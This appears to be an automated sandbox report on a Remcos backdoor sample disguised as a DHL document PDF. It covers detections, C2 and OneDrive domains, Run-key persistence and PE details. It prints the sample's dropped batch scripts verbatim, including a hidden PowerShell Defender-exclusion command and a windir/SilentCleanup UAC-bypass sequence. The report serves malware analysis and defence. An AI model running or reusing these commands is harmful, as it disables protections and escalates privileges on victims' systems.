              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491719 Sample: ENTREGA DE DOCUMENTOS DHL _... Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 44 ongod4ever.ddns.net 2->44 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->68 70 6 other signatures 2->70 9 ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe 1 22 2->9         started        14 Iqzenco.exe 15 2->14         started        16 Iqzenco.exe 15 2->16         started        signatures3 process4 dnsIp5 50 sn-files.fe.1drv.com 9->50 52 onedrive.live.com 9->52 54 bl30uw.sn.files.1drv.com 9->54 42 C:\Users\Public\Libraries\...\Iqzenco.exe, PE32 9->42 dropped 78 Writes to foreign memory regions 9->78 80 Allocates memory in foreign processes 9->80 82 Creates a thread in another existing process (thread injection) 9->82 18 mobsync.exe 2 9->18         started        22 cmd.exe 1 9->22         started        24 cmd.exe 1 9->24         started        56 sn-files.fe.1drv.com 14->56 60 2 other IPs or domains 14->60 84 Multi AV Scanner detection for dropped file 14->84 26 mobsync.exe 14->26         started        58 sn-files.fe.1drv.com 16->58 62 2 other IPs or domains 16->62 28 secinit.exe 16->28         started        file6 signatures7 process8 dnsIp9 46 ongod4ever.ddns.net 185.140.53.15, 49771, 49774, 49775 DAVID_CRAIGGG Sweden 18->46 48 192.168.2.1 unknown unknown 18->48 72 Contains functionality to steal Chrome passwords or cookies 18->72 74 Contains functionality to steal Firefox passwords or cookies 18->74 76 Delayed program exit found 18->76 30 reg.exe 1 22->30         started        32 conhost.exe 22->32         started        34 cmd.exe 1 24->34         started        36 conhost.exe 24->36         started        signatures10 process11 process12 38 conhost.exe 30->38         started        40 conhost.exe 34->40         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe26%VirustotalBrowse
              ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe24%ReversingLabsWin32.Backdoor.Remcos

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe24%ReversingLabsWin32.Backdoor.Remcos

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              0.0.ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              18.0.Iqzenco.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              18.1.Iqzenco.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              22.2.mobsync.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              0.1.ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.2.mobsync.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              26.2.secinit.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              16.0.Iqzenco.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              16.1.Iqzenco.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              ongod4ever.ddns.net0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ongod4ever.ddns.net
              		185.140.53.15
              		truefalse
                		high
                onedrive.live.com
                		unknown
                		unknownfalse
                  		high
                  bl30uw.sn.files.1drv.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    ongod4ever.ddns.nettrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://bl30uw.sn.files.1drv.com/y4maOmpRLgEZgKpnLv-hczrMb96VqtMQDZd-m0g51QRpK-v8c65WYNUi2NOLDdGNQiUIqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmpfalse
                      		high
                      https://bl30uw.sn.files.1drv.com/y4msI7_EyjC8cs97rdyt7ReCTl2WoedGiqx9hVOiugfpodFj4cXgoX5lAQfrGe41zrtIqzenco.exe, 00000010.00000003.750846747.00000000007A3000.00000004.00000001.sdmpfalse
                        		high
                        https://onedrive.live.com/download?cid=97429F42E815B766&resid=97429F42E815B766%21166&authkey=AFRFbbmIqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmpfalse
                          		high
                          https://bl30uw.sn.files.1drv.com/y4mGst0byrg6Ub0CK8iKHaximJI4M7D1uUmqxfl02ZpIfKXbkyeYXQLL6P2J6UxS4YzIqzenco.exe, 00000010.00000003.750864485.00000000007B1000.00000004.00000001.sdmpfalse
                            		high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            185.140.53.15
                            		ongod4ever.ddns.netSweden
                            		209623DAVID_CRAIGGGfalse

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:491719
                            Start date:27.09.2021
                            Start time:20:38:59
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 13m 28s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:28
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@23/10@49/2
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 44.2% (good quality ratio 42.2%)
                            • Quality average: 83.9%
                            • Quality standard deviation: 25.5%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 15
                            • Number of non-executed functions: 166
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 2.20.86.117, 13.107.43.13, 13.107.42.12, 20.82.209.183, 209.197.3.8, 13.107.42.13, 20.54.110.249, 40.112.88.60, 23.10.249.43, 23.10.249.26, 20.50.102.62
                            • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, l-0004.dc-msedge.net, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            20:39:58API Interceptor2x Sleep call for process: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe modified
                            20:40:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Iqzenco C:\Users\Public\Libraries\ocnezqI.url
                            20:40:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Iqzenco C:\Users\Public\Libraries\ocnezqI.url
                            20:40:34API Interceptor2x Sleep call for process: Iqzenco.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\Public\KDECO.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):155
                            Entropy (8bit):4.687076340713226
                            Encrypted:false
                            SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                            MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                            SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                            SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                            SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                            C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1009152
                            Entropy (8bit):6.9988393829759294
                            Encrypted:false
                            SSDEEP:24576:L5A8SqIkJpbDpQc6ScVHdPaHxA7VhLRYF:Lr5ZoHdPaRyzKF
                            MD5:3808D4A11CBEE20896CCA28F9A3BCB9B
                            SHA1:B3A533D6E00ACE2EC0612C9AF66C6DD69C5180B3
                            SHA-256:53C2E53D33F80E88B16CCE06621F99680E0E5F387315CB81AF97CEE58080165A
                            SHA-512:980425EFD3D01A3C5ADBBD3873D819AF60C1E62A9B32149B01F1C1E6DE338D068B53C18AD4645C66E8C13DB8F21440F2E0C01B27E3B1E4AF55D19474EC83A5FD
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^.*.................j...........z............@..............................................@...............................(......./...................@..0r...........0...............0..........................X....................................].......^.................. ..`........P....p.......b.............. ..`.........&.......(...n..............@............8.......................................(.......*..................@...........4.... ..................................0....0......................@..@........0r...@...t..................@..B........./.......0...6..............@..@.............0......................@..@................................................................................................
                            C:\Users\Public\Libraries\ocnezqI.url
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Iqzenco\\Iqzenco.exe">), ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):96
                            Entropy (8bit):4.740775825389126
                            Encrypted:false
                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMfiyGAywSsGKd6ov:HRYFVmTWDyzFlsbDv
                            MD5:5E9FED8C24BB01153751DF696536E82A
                            SHA1:D23E4B05254E62153D6F0158F4F869AB00C5DF15
                            SHA-256:08BC6F401999D30F1EB81AD3C9CB0EB01063CF858C9818F238ED233833947AE8
                            SHA-512:4920341592295B38653FD6DD227F99625A1E62C3E1E9CE014F506C724319528A6E45829C21B62A5674FF47BB3BD1B62FD2DB9A24583208DC7659E4B88A8BB7FD
                            Malicious:false
                            Yara Hits:
                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\ocnezqI.url, Author: @itsreallynick (Nick Carr)
                            Reputation:unknown
                            Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Iqzenco\\Iqzenco.exe"..IconIndex=2..
                            C:\Users\Public\Trast.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):34
                            Entropy (8bit):4.314972767530033
                            Encrypted:false
                            SSDEEP:3:LjTnaHF5wlM:rnaHSM
                            MD5:4068C9F69FCD8A171C67F81D4A952A54
                            SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                            SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                            SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min C:\Users\Public\UKO.bat
                            C:\Users\Public\UKO.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):250
                            Entropy (8bit):4.865356627324657
                            Encrypted:false
                            SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                            MD5:EAF8D967454C3BBDDBF2E05A421411F8
                            SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                            SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                            SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                            Malicious:false
                            Reputation:unknown
                            Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                            C:\Users\Public\nest
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):9
                            Entropy (8bit):3.169925001442312
                            Encrypted:false
                            SSDEEP:3:1xn:Hn
                            MD5:4D2B6925406544EEF7111380E2243791
                            SHA1:A32A8FA6F2E46D8E86FA92BEA3B8D45EB168BD04
                            SHA-256:09A841DC20255A929B3CCFA47B08B8E47ADD965FF3070E8DAB1DBD050D73E97F
                            SHA-512:EFDD6C90C7EAA5D05FDD079A61B969837B350CB20AECC7CF24533636956A939B8A289B2C3BB4A7AC21BBACF818E394A13D8661427EACFC0F21C46D5855DFFEDF
                            Malicious:false
                            Reputation:unknown
                            Preview: Iqzenco..
                            C:\Users\Public\nest.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):53
                            Entropy (8bit):4.263285494083192
                            Encrypted:false
                            SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
                            MD5:8ADA51400B7915DE2124BAAF75E3414C
                            SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                            SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                            SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min reg delete hkcu\Environment /v windir /f..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown
                            Preview: .....6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]%......(& ...P...sZ.G..W#..v..FN.}r...kG.....c2>.......K.(& &!.)....7..6G..U..9.v..FN.}r...l.)....n.7..N.}r...oP..oP......2>X...X.u.;.....:.|..y1.-..n....6.X..OWOT...'.v....G..<.cgn.R.X........u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........&N.n..+..u.U"OT..t..X.....X....u.8..>5..{....wT.I....#......{..........|+m.z..h4.?9+Q........Nk....^U...y..I.u.....o...!{.M..dK.$....s.5;....m.Y..mr..".*...y...\.y..>.....F.;..k..a.......%~.....i.s.q.n!g.....+Ne.*.[.~...y..Ra.C..9<..q....J.v.......u.#a.Vp770./PdXs.......{.P`L..=8..{...]......96... .~...9 ..v..`Q...Zl/V|....'.r3;.u.>..1U..bU..j.V}..154...
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown
                            Preview: .....6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]%......(& ...P...sZ.G..W#..v..FN.}r...kG.....c2>.......K.(& &!.)....7..6G..U..9.v..FN.}r...l.)....n.7..N.}r...oP..oP......2>X...X.u.;.....:.|..y1.-..n....6.X..OWOT...'.v....G..<.cgn.R.X........u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........&N.n..+..u.U"OT..t..X.....X....u.8..>5..{....wT.I....#......{..........|+m.z..h4.?9+Q........Nk....^U...y..I.u.....o...!{.M..dK.$....s.5;....m.Y..mr..".*...y...\.y..>.....F.;..k..a.......%~.....i.s.q.n!g.....+Ne.*.[.~...y..Ra.C..9<..q....J.v.......u.#a.Vp770./PdXs.......{.P`L..=8..{...]......96... .~...9 ..v..`Q...Zl/V|....'.r3;.u.>..1U..bU..j.V}..154...
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown
                            Preview: .....6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]%......(& ...P...sZ.G..W#..v..FN.}r...kG.....c2>.......K.(& &!.)....7..6G..U..9.v..FN.}r...l.)....n.7..N.}r...oP..oP......2>X...X.u.;.....:.|..y1.-..n....6.X..OWOT...'.v....G..<.cgn.R.X........u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........&N.n..+..u.U"OT..t..X.....X....u.8..>5..{....wT.I....#......{..........|+m.z..h4.?9+Q........Nk....^U...y..I.u.....o...!{.M..dK.$....s.5;....m.Y..mr..".*...y...\.y..>.....F.;..k..a.......%~.....i.s.q.n!g.....+Ne.*.[.~...y..Ra.C..9<..q....J.v.......u.#a.Vp770./PdXs.......{.P`L..=8..{...]......96... .~...9 ..v..`Q...Zl/V|....'.r3;.u.>..1U..bU..j.V}..154...

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.9988393829759294
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.94%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File size:1009152
                            MD5:3808d4a11cbee20896cca28f9a3bcb9b
                            SHA1:b3a533d6e00ace2ec0612c9af66c6dd69c5180b3
                            SHA256:53c2e53d33f80e88b16cce06621f99680e0e5f387315cb81af97cee58080165a
                            SHA512:980425efd3d01a3c5adbbd3873d819af60c1e62a9b32149b01f1c1e6de338d068b53c18ad4645c66e8c13db8f21440f2e0c01b27e3b1e4af55d19474ec83a5fd
                            SSDEEP:24576:L5A8SqIkJpbDpQc6ScVHdPaHxA7VhLRYF:Lr5ZoHdPaRyzKF
                            File Content Preview:MZ......................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                            File Icon

                            Icon Hash:d2e6c45663c86871

                            Static PE Info

                            General

                            Entrypoint:0x477a08
                            Entrypoint Section:......
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                            DLL Characteristics:
                            Time Stamp:0x2A2E5E19 [Thu Jun 4 18:16:57 1992 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:7485e319df85e87afca01bdc77d12961

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFF0h
                            mov eax, 00476B38h
                            call 00007F8F78AFEEADh
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            call 00007F8F78B53339h
                            mov ecx, dword ptr [0047A270h]
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            mov edx, dword ptr [0047656Ch]
                            call 00007F8F78B53339h
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            call 00007F8F78B533ADh
                            call 00007F8F78AFCD1Ch
                            lea eax, dword ptr [eax+00h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x7f0000x28e6......
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x72fc2.....
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000x7230......
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x830180x18......
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x830000x18......
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x7f7ac0x658......
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .....0x10000x75dc00x75e00False0.529974151644data6.5690645697IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
